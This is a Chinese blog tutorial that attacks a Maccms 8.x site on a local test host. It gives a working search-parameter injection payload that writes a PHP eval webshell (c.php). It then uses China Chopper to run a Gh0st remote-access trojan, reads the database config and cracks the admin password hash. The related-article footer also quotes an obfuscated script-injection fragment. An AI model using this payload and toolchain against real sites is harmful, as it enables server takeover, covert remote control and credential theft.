苹果cms x.8 取管理员权限

最新推荐文章于 2024-06-22 10:21:11 发布
最新推荐文章于 2024-06-22 10:21:11 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Simon798/article/details/89369989
版权

用到的工具

· 火狐插件:hackbar
· 中国菜刀
· gh0st
· 苹果 cms 历史漏洞:https://blog.csdn.net/m0_37438418/article/details/81006161

操作步骤

  1. 下载火狐插件 hackbar ,在苹果 cms 的主页搜索界面:(临时搭的站)
    http://192.168.0.137/
    在这里插入图片描述

2.按下 F12 点 HackBar , 选择 Post data 填写如下内容,点击 Execute 按钮

·http://192.168.0.137/index.PHP?m=vod-search
·wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x
MD5解密:<?php @eval($_POST[c]); ?>1
就是创建 c.php 传入参数 c

在这里插入图片描述
3.打开中国菜刀,右键 -> 添加 。输入以下内容:
在这里插入图片描述
4. 找到 config.php 文件,打开:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
5.打开 Gh0st 。选项 -> 创建客户 , 输入以下信息后测试连接:
在这里插入图片描述
在这里需要查找合适的端口,尽量选择数字大的端口,查看此端口是否被占用,如果被占用则结束占用此端口的进程:
在这里插入图片描述
在这里插入图片描述

  1. 如果测试连接成功,点击 “生成” 按钮 , 将木马文件保存。
    在这里插入图片描述
  2. 把 server.exe 放入菜刀(直接拖进去)
    在这里插入图片描述
  3. 打开菜刀 右键 -> 虚拟终端 , 输入 server.exe 执行木马文件。之后会在Gh0st 下看到被连接的用户。
    在这里插入图片描述
    在这里插入图片描述
  4. 右键 -> 屏幕控制 ,右键 -> 控制屏幕 。 打开 Phpstudy -> MySQL 管理器 -> MySQL-Front
    在这里插入图片描述
    10 找到在config.php 里对应的数据库名 “maccms” , 打开可疑的表 “mac_manager”

管理员账号:admin
管理员密码:a66abb5684c45962d887564f08346e8d
解密后:admin123456

在这里插入图片描述
登录后台:
在这里插入图片描述
成功!
在这里插入图片描述

(-: LYSM :-)
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2023最新苹果CMS10魔加主题1.1.6去授权版+支持全部版本
egrhrg的博客
01-19 3366
后台快捷菜单配置添加魔加主题,mojia/theme,有兴趣的自行去安装体验吧,其它就没什么好介绍的了。
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
苹果CMS主题 MXonePro二开优化修复开源版
最新发布
heima888的博客
06-22 300
苹果CMS主题MXonePro二开优化修复开源版是一个针对苹果CMS系统的开源主题,经过二次开发和优化修复,以满足特定需求并解决潜在问题。安装方法通常包括将解压后的文件放置到网站根目录,并在苹果CMS后台的快捷菜单中添加相应的主题链接(如“MxPro后台”,路径为“mxpro/mxproset”)。综上所述,苹果CMS主题MXonePro二开优化修复开源版是一个功能丰富、易于定制且经过优化的主题,适用于各种基于苹果CMS系统的网站项目。请注意,虽然该主题是开源的,但某些版本可能需要授权才能使用。
2020解决苹果CMS漏洞被挂马v8 v10最新版本
网站安全专家
01-04 4784
苹果CMS漏洞是越来越多了,国内很多电影网站都使用的是maccms V10 V8版本,就在2020年初该maccms漏洞爆发了,目前极少数的攻击者掌握了该EXP POC,受该BUG的影响,百分之80的电影站都被攻击了,很多电影站的站长找到我们SINE安全来解决网站被挂马的问题,通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码,<script src=https://lefengtv...
苹果cms最新漏洞被挂马跳转劫持及清除代码
sexrenge的博客
09-03 6399
网站被挂马跳转劫持跳转到H APP下载页。 被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。 挂马图片 通过日志查看挂马过程 该漏洞是利用苹果CMS的API执行SHELL, 挂马文件在模板的jquery.min.js ;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x
苹果MAC-CMS漏洞复现(SQL注入+命令执行漏洞写shell)
信安小菜鸡的博客
05-19 3407
前台修改密码处存在sql注入漏洞 注册账户登录后发送POST 查看数据库 查看用户 不过后续操作一直被拦截,暂未找到过滤方法 命令执行漏洞 直接获php info信息 写shell 弱口令 admin/admin/123456 ...
苹果CMS v10 2022.8.3官方原版源码
09-11
标题提及的“苹果CMS v10 2022.8.3官方原版源码”指的是该系统于2022年8月3日在GitHub上更新的v2022.1000.3032版本,确保了源码未经任何第三方修改,保证了系统的纯净和安全性。 【LICENSE】文件通常包含软件的许可...
苹果CMS v10 整合ckplayerX 播放器.rar
05-22
苹果CMS是一款广泛应用于搭建视频网站的内容管理系统,而ckplayerX则是一个流行的HTML5与Flash兼容的视频播放器。本文将详细介绍如何将ckplayerX整合到苹果CMS v10系统中,以便为用户提供更好的视频播放体验。 首先...
苹果CMS视频分享程序 v8 bulid2019.1006
08-21
8. **多语言支持**:对于面向全球用户的网站,苹果CMS支持多语言设置,便于拓展海外市场。 9. **API接口**:提供API接口,方便与其他系统集成,如社交媒体、第三方支付平台等,扩展网站功能。 10. **持续更新**:...
苹果CMS视频分享程序 v8 bulid2019.1010
08-21
8. **更新与维护**:苹果CMS会定期发布新版本,修复已知问题,增加新功能,确保系统的与时俱进。v8 build2019.1010版本即是这一系列努力的成果,提供了更多优化和改进。 至于压缩包中的“4820200104074239”,可能...
苹果cms8x采集规则发布模块
11-01
苹果CMS8x采集规则发布模块是针对苹果CMS内容管理系统(CMS)的一个重要组成部分,主要用于自动化地获网络上的信息并发布到网站上。苹果CMS是一款流行的内容管理软件,它提供了丰富的功能,包括文章管理、视频管理...
【2021】最新苹果CMS10二次开发版+原生APP.zip
04-22
苹果CMS二次开发版+安装说明+APP安卓原生+APP安卓原生使用教程,压缩包大小575 MB (603,545,400 字节)
苹果cms二次开发完美支持邀请码(By祭夜)
02-09
苹果cms二次开发完美支持邀请码(By祭夜) 更新官方最新2018.02.04
【漏洞复现】maccms苹果cms 命令执行漏洞
失心少年
11-16 2021
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。“苹果CMS” 似乎是指 “Maccms”,这是一款开源的内容管理系统,主要用于搭建视频网站。Maccms 提供了一套完整的解决方案,包括用户管理、视频上传、分类管理、数据统计等功能,使用户能够方便地创建和管理自己的视频网站。
苹果cms10的一次尝试发现了苹果cms10被挂马极有可能是苹果cms作者故意的js漏洞或后门导致
jun2016425的博客
10-30 9379
最近闲无事想建个站来玩玩,但是又不想写于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的. 被挂马表现: 播放视频时,有一定的概率会加载 http://union.maccms.com/html/top10.js 苹果cms后台某处或者采集的资源打印奇怪的字符比如 {if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuan.
苹果maccms网站漏洞进行修复解决方法教程
weixin_46020146的博客
09-05 292
苹果maccms网站漏洞进行修复解决方法教程
苹果maccms最新漏洞补丁 防止数据库被反复挂马
网站安全资讯
01-02 541
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> ...
Maccms8.x 命令执行漏洞分析
fly小灰灰的专栏
07-30 7085
1. 漏洞描述 漏洞简述: Maccms搜索页面搜索输入参数过滤不严谨导致前台命令执行可getshell 影响版本: Maccms8.x 2. 漏洞简介  魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。  该漏洞主要的产生原因是CMS搜索页面搜索
location苹果_最新苹果cms漏洞被频繁挂马该如何解决
weixin_42627812的博客
12-12 380
2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导致网站打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞受影响的苹果系统版本是V8,V10,很多客户网站被反复篡改,很无奈,通过朋友介绍找到我们寻求技术上支持,防止网站被挂马。根据客户的反应,服务器采用的是linux centos系统...
苹果cmsv10免费x模板
09-25
苹果CMSV10是一款知名的内容管理系统,它提供了丰富的功能和模板选择,其中免费的X模板是该系统中的一个免费模板。这个模板拥有简洁、美观的外观设计,适用于个人博客、企业官网或其他类型的网站。 苹果CMSV10免费X...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值